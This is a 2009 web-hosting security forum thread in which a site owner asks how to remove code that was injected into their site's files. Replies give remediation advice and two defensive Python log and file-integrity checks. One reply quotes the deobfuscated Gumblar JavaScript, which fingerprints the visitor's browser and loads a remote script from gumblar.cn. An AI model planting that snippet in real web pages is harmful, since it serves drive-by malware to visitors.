| Internet Security Discussion Forum This forum is for the discussion of security related issues. If you find a new Phishing scheme, spyware, virus or malicious site - let us know about it. If any of the above found you... here's where you ask for help. |
Hello,
My forum is running on a hosting company. My forum and the whole website were infected by a virus last week on Friday. Most of the files were infected.
Infected files: "index.html" "index.htm" "index.php" "xxx.html" "xxx.tbl" "xxx.js" ...
All the files were modified by adding some code to the files. Here are the codes.
For the HTML files: <removed - wige>
For the PHP files: <removed - wige>
I did clear up (remove the codes from the files) all the files on this Monday and the web works fine, but today the website got the virus again. So, can someone tell me how to remove the virus? I already scanned my PC and it has no virus on it. Today I did clean up the web site and it seems to be working fine now. But I am worried that the virus will come back again. Thanks.
Last edited by wige; 06-04-2009 at 10:40 AM. Reason: Removed the exploit code, it was triggering some users' antivirus software
|
|||
|
I have seen things like this before. The virus has probably infected the entire server and not just your web site. That may be why it has returned. The hacker may have root access to the server.
The first thing to do is to report it to the hosting company. They need to check the security for your site and their server.
1. Make sure that permissions are set correctly for your web site scripts.
2. Change your access passwords (FTP, cPanel, root) and make sure they are very secure passwords. Do not use dictionary words for your passwords.
3. If you are using open source software or something you purchased, make sure the version is current and check their forums to see if others are having the same problem.
4. If it keeps coming back or the hosting company is not cooperative, find a new hosting company.
__________________
Facts are meaningless. They can be used to prove anything. - Homer Simpson MySQL Cheatsheet :: Arizona SEO training |
|
|||
|
Someone has access to your server. You'll be cleaning twice a week for the foreseeable.
If your host has yet to deal with it the answer (which is a pain, but you already know) is to change hosts. |
|
|||
|
This doesn't look like a virus to me, per se. It looks more like you've experienced some cross-site injection attacks; which in essence are hacks. You need to make sure all your directories have the proper permissions and you need to properly validate all the variables inputted into your site.
In your logfiles look for http:// in your queries. Here is a log example of a slightly similar type of attack. I've added a few spaces to prevent linking. Quote:
__________________
I use Country IP Blocks as added security for my networks and servers. |
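The log check suggested in the post above, as an added example that is not part of the original thread: it reads Apache combined-format access log lines and reports query parameters whose value is a full URL, including percent-encoded ones. The log lines, script names and parameter names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache combined log format; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# A parameter whose value is itself a URL is what the post says to look for.
URL_VALUE_RE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, hypothetical script and
# parameter names); the last one mentions "http" without being a URL.
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Jun/2009:10:01:02 +0000] "GET /forum/index.php?topic=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [04/Jun/2009:10:03:44 +0000] "GET /index.php?page=http://files.example.net/x.txt? HTTP/1.1" 200 312 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [04/Jun/2009:10:03:45 +0000] "GET /gallery.php?inc=http%3A%2F%2Ffiles.example.net%2Fx.txt HTTP/1.1" 404 210 "-" "libwww-perl/5.805"',
    '192.0.2.33 - - [04/Jun/2009:10:05:00 +0000] "GET /search.php?q=what+is+http HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

def find_url_parameters(lines):
    """Return one record per query parameter that carries a full URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a request line in the expected format
        query = urlsplit(m["target"]).query
        # parse_qsl percent-decodes, so http%3A%2F%2F is caught as well
        for name, value in parse_qsl(query, keep_blank_values=True):
            if URL_VALUE_RE.match(value):
                hits.append({"ip": m["ip"], "status": int(m["status"]),
                             "param": name, "value": value})
    return hits

if __name__ == "__main__":
    for hit in find_url_parameters(SAMPLE_LOG):
        print(hit)
```

A hit only shows that the request was made; whether the script acted on the value has to be checked in the application code.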
|
||||
|
The javascript resolves to the following.
The real damage (whatever that may be) is done by a script being called at gumblar dot cn. I don't really want to run the script just to find out what it does.
Code:
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if( (u.indexOf("Win")>0) &&
(u.indexOf("NT 6")<0) &&
(document.cookie.indexOf("miek=1") < 0) &&
(typeof(zrvzts) != typeof("A"))) {
zrvzts="A";
eval("if(window."+a+") j = j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=//gumblar.cn/rss/?id="+j+">
<\/script>");
}
Quote:
|
|
||||
|
We had this problem a few months ago and it was a pain to remove - what you will find is that in every index file this code will eventually be loaded and in every directory you will also probably find a php file with a number or weird name - you can usually remove them with ftp, BUT, the file that causes the most problem is the htaccess file which this hacker script injects into every directory - I had to use shell access to be able to see the htaccess files and manually delete every file as well.
In our case the hosting company initially told us that it was all our fault and nothing to do with them, then after I took the whole website down (including about 300,000 images), cleaned it all out and rebuilt the site using all the latest software upgrades, the hosting company sent out a letter saying how proactive they were and had caught this attack and cleaned it on 23,000 sites they host. To say the least we were not impressed. However, contact the hosting company straightaway and tell them, as they may be able to strip the bogus php files and htaccess files quickly for you, else you may have a laborious process removing them all yourself. Also put your site into maintenance mode if you can else you will begin infecting visitor computers - we also had this and had a warning coming up from Google to say we were not safe to visit, which seriously impacts on profits quite quickly until being reinstated. Good luck
__________________
Creating affordable website & eCommerce solutions for NZ businesses, clubs and orgs. http://www.medlicottdesign.orconhosting.net.nz |
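One way to catch the changes described in the post above (modified index files, new PHP files, and .htaccess files that FTP listings hide), as an added example that is not part of the original thread: take a hash snapshot of the site right after cleanup and compare later snapshots against it. The sample site, file names and contents are constructed.

```python
import hashlib
import os
import tempfile

def snapshot(root):
    """Map every file under root (dotfiles included) to its SHA-256 digest."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                digests[os.path.relpath(path, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests

def compare(baseline, current):
    """Return what changed since the baseline was taken on the cleaned site."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline.keys() & current.keys()
                           if baseline[p] != current[p]),
    }

def write(root, rel, body):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "ab") as fh:  # append, so a second write models an injection
        fh.write(body)

def demo():
    """Constructed site: snapshot after cleanup, then the changes the post lists."""
    root = tempfile.mkdtemp(prefix="webroot-")
    write(root, "index.html", b"<html><body>home</body></html>")
    write(root, os.path.join("images", "logo.txt"), b"constructed asset")
    baseline = snapshot(root)
    # Constructed stand-ins for the three kinds of change described in the post
    write(root, "index.html", b"<!-- constructed stand-in for injected code -->")
    write(root, os.path.join("images", ".htaccess"), b"# constructed\n")
    write(root, os.path.join("images", "84213.php"), b"<?php /* constructed */ ?>")
    return compare(baseline, snapshot(root))

if __name__ == "__main__":
    for change, paths in demo().items():
        print(change, paths)
```

Keep the baseline off the server, since anyone who can write to the web root can also rewrite a baseline stored there.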
|
|||
|
Quote:
__________________
Facts are meaningless. They can be used to prove anything. - Homer Simpson MySQL Cheatsheet :: Arizona SEO training |
|
||||
|
Most likely vector: outdated software. Make sure you apply any and all updates to all software running on your site.
If you have the ability to disable or aggressively restrict remote file includes and filesystem access within PHP, do so.
__________________
Dan LeFree | Product Manager (Linux VPS Hosting) | Owner/Operator (Web development, marketing) |
WebProWorld is an iEntry, Inc. ® site - © 2009 All Rights Reserved Privacy Policy and Legal iEntry, Inc. 2549 Richmond Rd. Lexington KY, 40509 |